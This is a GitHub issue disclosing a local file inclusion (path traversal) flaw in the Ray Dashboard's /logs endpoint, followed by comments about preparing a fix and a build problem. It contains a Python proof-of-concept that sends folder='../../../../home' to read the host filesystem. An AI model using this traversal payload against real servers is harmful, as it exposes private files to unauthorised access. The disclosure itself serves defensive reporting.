search

ray-project / ray

Ray is a unified framework for scaling AI and Python applications. Ray consists of a core distributed runtime and a set of AI Libraries for accelerating ML workloads.
https://ray.io
Apache License 2.0
33.31k stars 5.63k forks source link

Ray Dashboard is susceptible to a Local File Inclusion bug with default settings #45751

Open rmhowe425 opened 4 months ago

rmhowe425 commented 4 months ago

What happened + What you expected to happen

Description Just as the title suggests, when initially starting up the Ray dashboard I can parse my local file system by supplying the folder HTTP parameter in GET requests to the /logs API endpoint in conjunction with relative file paths.

Expected Behavior As a best practice, relative file paths should not be permitted, or should be ignored. Basic access controls should be implemented to prevent unauthorized users from being able to parse the underlying file system being used by Ray.

Useful Information 1) Taking a cursory glance at the Ray GH Issues board, it appears that this issue was discussed (and addressed) here and here

2) As seen in the provided script, the nodeId HTTP parameter must be included in GET requests.

image

Versions / Dependencies

2.9.1 and 2.23.0

Reproduction script

from requests import get

url = 'http://<ip address>:8265/#/logs' headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8', 'Accept-Encoding': 'gzip, deflate, br, zstd', }

params = {'folder': '../../../../home', 'nodeId': '<nodeId>' }

try: resp = get(url=url, params=params, headers=headers) except Exception as e: print(f'GET request failed: {str(e)}')

if resp.status_code != 200: print('ERROR server responded with: {resp.status_code}, {resp.content}') else: print(f'Response\n==========\n{resp.content}')

Issue Severity

Medium: It is a significant difficulty but I can work around it.

rmhowe425 commented 3 months ago

@anyscalesam Happy to try and submit a PR for this issue

rmhowe425 commented 3 months ago

@anyscalesam I'll go ahead and draft up a PR for this issue

brycehuang30 commented 3 months ago

@rmhowe425 Thanks for reporting and taking this issue. I assign the issue to you, but please feel free to drop the assignment if you decide not to commit the PR. Do you mind link back this issue when you post the PR?

rmhowe425 commented 3 months ago

@brycehuang30 Absolutely!

rmhowe425 commented 3 months ago

@brycehuang30 @anyscalesam Hey guys n00b question here.

I'm going through the Setting up your Development Environment instructions and I'm having some issues. I followed the instructions for Preparing to build Ray on Linux and I'm trying to run the command: pip install -e . --verbose

However, towards the very end of the build my RAM (16Gb) is maxed out and my computer freezes up. Surely I'm not the only one to experience this problem. Any suggestions on steps that I can take to optimize the build process so that I can push forward with my contribution for this GH issue?

anyscalesam commented 3 months ago

Cc @aslonnie